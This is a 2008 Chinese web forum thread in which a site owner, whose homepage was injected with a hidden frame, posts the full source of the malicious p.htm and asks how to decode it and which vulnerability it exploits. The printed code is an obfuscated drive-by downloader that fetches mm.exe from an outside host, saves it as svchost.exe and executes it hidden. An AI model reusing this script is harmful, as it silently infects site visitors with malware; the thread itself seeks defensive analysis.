1   1  /  1  页   跳转

被挂网马了,帮分析下

被挂网马了,帮分析下

前天发现主页末尾多了个框架,最后找到这个元凶p.htm,用RISING扫了下,报是Trojan.DL.VBS.Psyme.ce,源码如下:
<script>
xinchunkuaile = "http://www.yxgm78.com/mm/mm.exe"
t="32,32,32,32,60,104,116,109,108,62,13,10,32,32,32,32,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,32,32,32,32,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,32,32,32,32,70,112,105,110,103,112,105,110,103,97,110,97,110,61,34,111,34,38,34,98,34,38,34,106,34,38,34,101,34,38,34,99,116,34,13,10,32,32,32,32,75,112,105,110,103,112,105,110,103,97,110,97,110,61,34,99,34,38,34,108,34,38,34,97,34,38,34,115,34,38,34,115,34,38,34,105,34,38,34,100,34,13,10,32,32,32,32,84,112,105,110,103,112,105,110,103,97,110,97,110,61,34,99,34,38,34,108,34,38,34,115,34,38,34,105,100,34,38,34,58,34,38,34,66,34,38,34,68,34,38,34,57,54,34,38,34,67,34,38,34,53,53,54,34,38,34,45,34,38,34,54,34,38,34,53,34,38,34,65,34,38,34,51,45,34,38,34,49,49,34,38,34,68,34,38,34,48,34,38,34,45,34,38,34,57,56,34,38,34,51,34,38,34,65,34,38,34,45,34,38,34,48,48,34,38,34,67,34,38,34,48,52,34,38,34,70,67,34,38,34,50,57,34,38,34,69,34,38,34,51,54,34,13,10,32,32,32,32,77,112,105,110,103,112,105,110,103,97,110,97,110,61,34,77,34,38,34,105,34,38,34,99,114,34,38,34,111,115,111,34,38,34,102,34,38,34,116,34,38,34,46,34,38,34,88,34,38,34,77,34,38,34,76,34,38,34,72,84,84,80,34,13,10,32,32,32,86,112,105,110,103,112,105,110,103,97,110,97,110,61,34,83,34,38,34,104,101,34,38,34,108,34,38,34,108,34,38,34,46,34,38,34,65,34,38,34,112,112,34,38,34,108,34,38,34,105,34,38,34,99,34,38,34,97,34,38,34,116,34,38,34,105,34,38,34,111,110,34,13,10,87,112,105,110,103,112,105,110,103,97,110,97,110,61,34,83,34,38,34,99,34,38,34,114,34,38,34,105,112,34,38,34,116,105,34,38,34,110,34,38,34,103,34,38,34,46,34,38,34,70,34,38,34,105,34,38,34,108,34,38,34,101,34,38,34,83,34,38,34,121,34,38,34,115,34,38,34,116,34,38,34,101,34,38,34,109,34,38,34,79,34,38,34,98,34,38,34,106,34,38,34,101,34,38,34,99,34,38,34,116,34,13,10,32,32,32,32,83,101,116,32,120,105,110,99,104,117,110,107,117,97,105,108,101,99,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,70,112,105,110,103,112,105,110,103,97,110,97,110,41"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
    xinchunkuailec.setAttribute Kpingpinganan, Tpingpinganan
    xinchunkuailei=Mpingpinganan
    Set xinchunkuailed = xinchunkuailec.CreateObject(xinchunkuailei,"")
    yyuandankuailef="A"&"d"&"o"
    yyuandankuaileg="d"&"b."
    yyuandankuaileh="S"&"t"&"r"
    yyuandankuailei="e"&"a"&"m"
    xinchunkuailef=yyuandankuailef&yyuandankuaileg&yyuandankuaileh&yyuandankuailei
    xinchunkuaileg=xinchunkuailef
    set xinchunkuailea = xinchunkuailec.createobject(xinchunkuaileg,"")
    xinchunkuailea.type = 1
    xinchunkuaileh="G"&"E"&"T"
    xinchunkuailed.Open xinchunkuaileh, xinchunkuaile, False
    xinchunkuailed.Send
    xinchunkuaile9="svchost.exe"
    set xinchunkuaileb = xinchunkuailec.createobject(Wpingpinganan,"")
    set xinchunkuailee = xinchunkuaileb.GetSpecialFolder(2)
    xinchunkuailea.open
    xinchunkuaile8="xinchunkuailea.BuildPath(xinchunkuailea,xinchunkuaile8)"
    xinchunkuaile7="woxinyonghengb.BuildPath(woxinyonghengb,xinchunkuaile7)"
    xinchunkuaile6="xinchunkuailec"&"."&"B"&"u"&"i"&"l"&"dP"&"a"&"t"&"h(xinchunkuailed,xinchunkuaile6)"
    xinchunkuaile5="xinchunkuailed"&"."&"B"&"u"&"il"&"d"&"P"&"at"&"h(xinchunkuailef,xinchunkuaile5)"
    xinchunkuaile4="xinchunkuailee"&"."&"Bu"&"i"&"l"&"d"&"P"&"a"&"t"&"h(xinchunkuaileg,xinchunkuaile4)"
    xinchunkuaile3="xinchunkuailef"&"."&"B"&"u"&"i"&"l"&"d"&"Pa"&"t"&"h(xinchunkuaileh,xinchunkuaile4)"
    xinchunkuaile2="xinchunkuaileg"&"."&"B"&"u"&"il"&"d"&"P"&"a"&"t"&"h(xinchunkuailei,xinchunkuaile3)"
    xinchunkuaile1="xinchunkuaileh"&"."&"B"&"u"&"i"&"ld"&"P"&"a"&"t"&"h(xinchunkuaileg,xinchunkuaile1)"
    xinchunkuaile0="xinchunkuailei"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"at"&"h(xinchunkuailek,xinchunkuaile0)"
    xinchunkuaile9= xinchunkuaileb.BuildPath(xinchunkuailee,xinchunkuaile9)
    xinchunkuailea.write xinchunkuailed.responseBody
    xinchunkuailea.savetofile xinchunkuaile9,2
    xinchunkuailea.close
    set xinchunkuailee = xinchunkuailec.createobject(Vpingpinganan,"")
    xinchunkuailee.ShellExecute xinchunkuaile9,BBS,BBS,"o"&"p"&"en",0</script></html>
<script type="text/jscript">function init() { document.write("你好,您所访问的页面正在加载中...请稍候片刻....");}window.onload = init;</script>
当然这个网页的目的是下载执行mm.exe.好像是VBS加密的,我发帖的目的是想知道,解密的方法是什么?这个网马利用的是什么漏洞?那位帮我解下密?帮说说解密分析方法!我"百度"了很久也没找出办法来,只能来这里找高手了.在此先为谢过!
最后编辑2008-02-11 05:28:05
分享到:
gototop
 

对阿,xinchunkuaile = "http://www.yxgm78.com/mm/mm.exe"是没有加密,可其它代码是加密过的啊,利用的什么漏洞让其执行的?
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT